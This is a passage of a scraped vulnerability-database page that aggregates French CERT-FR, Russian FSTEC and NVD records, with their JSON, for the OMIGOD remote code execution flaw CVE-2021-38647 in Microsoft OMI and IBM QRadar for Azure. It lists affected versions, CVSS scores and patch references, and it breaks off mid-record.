None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "IBM QRadar versions 7.3.0 \u00e0 7.3.3 Patch 9",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "IBM QRadar versions 7.4.0 \u00e0 7.4.3 Patch 2",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    }
  ],
  "links": [],
  "reference": "CERTFR-2021-AVI-723",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-22T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans IBM QRadar Azure. Elle permet \u00e0\nun attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance.\n",
  "title": "Vuln\u00e9rabilit\u00e9 dans IBM QRadar Azure",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 6491159 du 20 septembre 2021",
      "url": "https://www.ibm.com/support/pages/node/6491159"
    }
  ]
}

CERTFR-2021-AVI-745

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité a été découverte dans IBM Qradar. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

L'éditeur indique que le port lié au service OMI n'est pas exposé mais recommande fortement d'appliquer les correctifs.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	IBM	QRadar	IBM QRadar pour Azure versions 7.3.3 Patch 9 et antérieures
	IBM	QRadar	IBM QRadar pour Azure versions 7.4.3 Patch 2 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité IBM 6491159 du 30 septembre 2021	None	vendor-advisory
Bulletin de sécurité IBM 6491159 du 30 septembre 2021	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "IBM QRadar pour Azure versions 7.3.3 Patch 9 et ant\u00e9rieures",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    },
    {
      "description": "IBM QRadar pour Azure versions 7.4.3 Patch 2 et ant\u00e9rieures",
      "product": {
        "name": "QRadar",
        "vendor": {
          "name": "IBM",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    }
  ],
  "links": [
    {
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 6491159 du 30 septembre 2021",
      "url": "https://www.ibm.com/support/pages/node/6491159"
    }
  ],
  "reference": "CERTFR-2021-AVI-745",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-10-01T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 d\u00e9couverte dans IBM Qradar. Elle permet \u00e0 un\nattaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance.\n\nL\u0027\u00e9diteur indique que le port li\u00e9 au service OMI n\u0027est pas expos\u00e9 mais\nrecommande fortement d\u0027appliquer les correctifs.\n",
  "title": "Vuln\u00e9rabilit\u00e9 dans IBM  Qradar",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 IBM 6491159 du 30 septembre 2021",
      "url": null
    }
  ]
}

BDU:2021-05448

Vulnerability from fstec - Published: 14.09.2021

Title

Уязвимость сервера управления предприятием через Интернет Open Management Infrastructure (OMI) расширений для управления виртуальными машинами Azure, связанная с ошибками управления генерацией кода, позволяющая нарушителю выполнить произвольный код

Description

Уязвимость сервера управления предприятием через Интернет Open Management Infrastructure (OMI) расширений для управления виртуальными машинами Azure связана с ошибками управления генерацией кода. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, выполнить произвольный код

Severity


                    
                      AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vendor

Microsoft Corp, Сообщество свободного программного обеспечения

Software Name

Azure Automation State Configuration, DSC Extension, Azure Automation Update Management, Azure Diagnostics (LAD), Azure Security Center, Azure Sentinel, Azure Stack Hub, Container Monitoring Solution, Log Analytics Agent, System Center Operations Manager (SCOM), Open Management Infrastructure (OMI)

Software Version

- (Azure Automation State Configuration, DSC Extension), - (Azure Automation Update Management), - (Azure Diagnostics (LAD)), - (Azure Security Center), - (Azure Sentinel), - (Azure Stack Hub), - (Container Monitoring Solution), - (Log Analytics Agent), - (System Center Operations Manager (SCOM)), до 1.6.8.1 (Open Management Infrastructure (OMI))

Possible Mitigations

Использование рекомендаций: Для Open Management Infrastructure (OMI): https://github.com/microsoft/omi Для продуктов Microsoft: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647

Reference

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647 https://github.com/AlteredSecurity/CVE-2021-38647 https://www.cybersecurity-help.cz/vdb/SB2021091418 https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv

CWE

CWE-94

JSON

To clipboard

{
  "CVSS 2.0": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
  "CVSS 3.0": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  "CVSS 4.0": null,
  "remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
  "remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
  "\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "Microsoft Corp, \u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "- (Azure Automation State Configuration, DSC Extension), - (Azure Automation Update Management), - (Azure Diagnostics (LAD)), - (Azure Security Center), - (Azure Sentinel), - (Azure Stack Hub), - (Container Monitoring Solution), - (Log Analytics Agent), - (System Center Operations Manager (SCOM)), \u0434\u043e 1.6.8.1 (Open Management Infrastructure (OMI))",
  "\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Open Management Infrastructure (OMI):\nhttps://github.com/microsoft/omi\n\n\u0414\u043b\u044f \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Microsoft:\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647",
  "\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "14.09.2021",
  "\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "24.09.2024",
  "\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "15.11.2021",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2021-05448",
  "\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2021-38647",
  "\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
  "\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
  "\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "Azure Automation State Configuration, DSC Extension, Azure Automation Update Management, Azure Diagnostics (LAD), Azure Security Center, Azure Sentinel, Azure Stack Hub, Container Monitoring Solution, Log Analytics Agent, System Center Operations Manager (SCOM), Open Management Infrastructure (OMI)",
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": null,
  "\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 Open Management Infrastructure (OMI) \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u043c\u0430\u0448\u0438\u043d\u0430\u043c\u0438 Azure, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043e\u0448\u0438\u0431\u043a\u0430\u043c\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0435\u0439 \u043a\u043e\u0434\u0430, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434",
  "\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u0432\u0435\u0440\u043d\u043e\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0435\u0439 \u043a\u043e\u0434\u0430 (\u0412\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430) (CWE-94)",
  "\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 Open Management Infrastructure (OMI) \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u043c\u0430\u0448\u0438\u043d\u0430\u043c\u0438 Azure \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u0448\u0438\u0431\u043a\u0430\u043c\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0435\u0439 \u043a\u043e\u0434\u0430. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434",
  "\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
  "\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u00abOMIGOD\u00bb",
  "\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430",
  "\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
  "\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u0418\u043d\u044a\u0435\u043a\u0446\u0438\u044f",
  "\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647\nhttps://github.com/AlteredSecurity/CVE-2021-38647\nhttps://www.cybersecurity-help.cz/vdb/SB2021091418\nhttps://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv",
  "\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
  "\u0422\u0438\u043f \u041f\u041e": "\u041f\u041e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438/\u041f\u041e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e-\u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0433\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430, \u0421\u0435\u0442\u0435\u0432\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e, \u0421\u0435\u0442\u0435\u0432\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e",
  "\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-94",
  "\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 10)\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 9,8)"
}

FKIE_CVE-2021-38647

Vulnerability from fkie_nvd - Published: 2021-09-15 12:15 - Updated: 2026-06-17 04:02

CISA KEV KEVintel KEV

Severity

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

Open Management Infrastructure Remote Code Execution Vulnerability

References

URL	Tags
secure@microsoft.com	http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html	Exploit, Third Party Advisory, VDB Entry
secure@microsoft.com	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/164694/Microsoft-OMI-Management-Interface-Authentication-Bypass.html	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647	Patch, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38647	US Government Resource

Impacted products

Vendor	Product	Version
microsoft	azure_automation_state_configuration	-
microsoft	azure_automation_update_management	-
microsoft	azure_diagnostics_\(lad\)	-
microsoft	azure_open_management_infrastructure	-
microsoft	azure_security_center	-
microsoft	azure_sentinel	-
microsoft	azure_stack_hub	-
microsoft	container_monitoring_solution	-
microsoft	log_analytics_agent	-
microsoft	system_center_operations_manager	-

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "cpes": [
            "cpe:2.3:a:microsoft:open_management_infrastructure:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Open Management Infrastructure",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMI Version 1.6.8-1",
              "status": "affected",
              "version": "16.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "System Center Operations Manager (SCOM)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMI version: 1.6.8-1",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Automation State Configuration, DSC Extension",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "DSC Agent versions: 2.71.1.25, 2.70.0.30, 3.0.0.3",
              "status": "affected",
              "version": "2.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Automation Update Management",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Log Analytics Agent",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_diagnostics:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Diagnostics (LAD)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "LAD v4.0.13 and LAD v3.0.135",
              "status": "affected",
              "version": "3.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Container Monitoring Solution",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_security_center:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Security Center",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_sentinel:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Sentinel",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_stack_hub:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Stack Hub",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "Monitor, Update and Config Mgmnt 1.14.01",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            },
            {
              "lessThan": "3.1.135",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "source": "secure@microsoft.com"
    }
  ],
  "cisaActionDue": "2021-11-17",
  "cisaExploitAdd": "2021-11-03",
  "cisaRequiredAction": "Apply updates per vendor instructions.",
  "cisaVulnerabilityName": "Microsoft Open Management Infrastructure (OMI) Remote Code Execution Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEC617A6-F1BC-44DE-A9BB-BECF2E788B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "23A8B342-E863-4C71-9CE1-FB325FF34829",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:azure_diagnostics_\\(lad\\):-:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AC51D6-F6F3-45D8-91E7-6EDD01C0273E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8477F336-71BB-4C49-A4EB-E1BC1EFF2F49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA1626DA-5B19-4291-B840-633EF458984C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B80F8C3B-BEF9-43D5-9455-6C6F608CF519",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "B457DA44-AD83-4E5C-B180-8A227462EC60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "68A461E8-C834-4F97-98E3-516A191A3BAA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "FDAE892B-324C-45E3-BFA0-C2B7B6939F54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "79983385-D5FE-4F76-924C-A2AA7E5BAAE8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open Management Infrastructure Remote Code Execution Vulnerability"
    },
    {
      "lang": "es",
      "value": "Una Vulnerabilidad de Ejecuci\u00f3n de C\u00f3digo Remota de Open Management Infrastructure"
    }
  ],
  "id": "CVE-2021-38647",
  "lastModified": "2026-06-17T04:02:31.017",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "secure@microsoft.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
